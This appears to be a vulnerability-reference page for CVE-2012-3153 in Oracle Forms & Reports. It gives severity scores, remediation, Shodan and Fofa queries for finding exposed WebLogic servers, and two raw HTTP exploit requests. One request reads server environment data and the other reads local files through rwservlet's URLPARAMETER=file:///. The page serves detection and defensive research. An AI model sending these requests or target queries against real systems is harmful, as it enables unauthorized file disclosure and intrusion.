🔙 목록으로 돌아가기

CVE-2012-3153: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)

TitleOracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
AuthorSid Ahmed MALAOUI @ Realistic Security
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution.
RemediationApply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
CVSS Score6.4
EPSS Score0.91205
CVE IDCVE-2012-3153
CWE IDNVD-CWE-noinfo
Shodan Queryhttp.title:"weblogic"http.html:"weblogic application server"
Fofa Querytitle="weblogic"body="weblogic application server"
Tags cve cve2012 oracle rce edb vkev vuln

🔍 Vulnerability Description

An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component.

🌐 HTTP Request

GET /reports/rwservlet/showenv HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-3153.yaml

🦈 Packet Capture: ⬇️ Download cve-2012-3153.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A